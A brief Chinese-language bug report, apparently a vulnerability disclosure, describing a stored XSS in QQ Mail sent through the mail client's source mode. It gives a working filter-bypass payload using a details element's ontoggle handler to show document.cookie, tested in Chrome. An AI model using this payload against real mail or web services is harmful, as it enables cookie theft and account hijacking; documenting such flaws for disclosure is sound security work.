额javascript中on事件挺多,找了个不被过滤的。。。 为了方便操作用QQ邮箱源码模式进行发送,为了发送成功需要添加一些文字内容不然会被拦截
<details ontoggle="confirm(document.cookie)"> xss <summary>click me</summary>xssxssxss </details>
可在Google Chrome Opera Safari下执行,我在Chrome上测试的。
参见:https://bugs.shuimugan.com/bug/view?bug_no=128793
